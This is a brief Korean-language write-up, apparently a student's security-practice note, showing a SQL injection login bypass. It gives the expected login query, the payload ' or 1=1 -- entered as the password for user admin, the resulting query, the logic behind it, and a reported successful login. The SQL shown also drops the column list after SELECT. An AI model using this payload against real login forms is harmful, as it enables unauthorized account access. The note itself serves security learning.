사용자 로그인 입력 값에 공격 문자열을 삽입하여 로그인 우회 공격 시도 (’ or 1=1 --)
예상 사용 SQL 문*
”SELECT FROM Members WHERE user_id = ‘id’ AND passwd = ‘pw’”;
- id, pw 입력
- id = admin, pw = ‘or 1=1 --
예상 SQL 문 변화
”SELECT FROM Members WHERE user_id = ‘admin’ AND passwd = ‘’ or 1=1--’”;
user_id = ‘admin’ AND passwd = ‘’ ⇒ False
1=1 ⇒ True 이기 때문에
user_id = ‘admin’ AND passwd = ‘’ or 1=1 ⇒ FALSE or TRUE ⇒ True 가 나오게 된다
- 공격 결과
로그인 성공하여 마이페이지 확인 가능
정보보안 꿈나무